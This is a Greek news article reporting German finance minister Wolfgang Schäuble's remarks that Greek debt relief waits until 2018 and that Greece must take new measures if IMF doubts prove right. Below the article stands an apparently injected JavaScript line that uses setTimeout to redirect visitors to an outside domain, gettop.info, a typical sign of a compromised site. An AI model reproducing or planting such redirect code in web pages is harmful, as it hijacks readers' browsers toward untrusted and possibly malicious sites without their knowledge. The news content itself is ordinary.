Σόιμπλε: Το χρέος; Το 2018 -Αν η Ελλάδα δεν πιάσει το στόχο, θα πάρει νέα μέτρα

0
12

Αμετακίνητος στη θέση ότι δεν θα υπάρξει συζήτηση για το ελληνικό χρέος πριν από την ολοκλήρωση του τρέχοντος μνημονίου το 2018, εμφανίστηκε ξανά ο Βόλφγκαγκ Σόιμπλε, σε συνέντευξή του στην εφημερίδα Stuttgarter Nachrichten.

«Αν μιλήσουμε τώρα για ελάφρυνση χρέους, αυτό θα εξασθενήσει τη μεταρρυθμιστική διάθεση της Ελλάδας. Το πρόβλημα δεν είναι άλλωστε το χρέος, αλλά η αδυναμία της διοίκησης και η έλλειψη ανταγωνιστικότητας. Εκεί πρέπει να γίνει η αρχή», δήλωσε χαρακτηριστικά.

Αναφερόμενος στις σοβαρές διαφωνίες του ΔΝΤ, είπε: «Πράγματι, το ΔΝΤ αμφιβάλλει ότι η Ελλάδα θα εφαρμόσει αυτά για τα οποία έχει δεσμευθεί. Όπως επίσης ότι αυτά τα μέτρα επαρκούν για να φέρουν τη χώρα σε ένα διαρκές μονοπάτι ανάπτυξης. Οι Έλληνες, αντιθέτως, έλεγαν πάντα: «Θα τα καταφέρουμε». Ως εκ τούτου, την Άνοιξη συμφωνήσαμε ότι η Αθήνα θα λάβει πρόσθετα μέτρα εάν το ΔΝΤ έχει δίκιο ως προς την απαισιοδοξία του. Αυτό το υπενθύμισα στον Έλληνα ομόλογό μου ξανά στη συνεδρίαση του Eurogroup τη Δευτέρα – και εκείνος διαβεβαίωσε ότι είναι έτσι».

«Οι Έλληνες σημειώνουν προόδους –ωστόσο δεν θα πρέπει να πιστέψουν ότι μπορούν να σταματήσουν να εφαρμόζουν τις υπεσχημένες μεταρρυθμίσεις», πρόσθεσε ο Γερμανός υπουργός Οικονομικών.

  setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here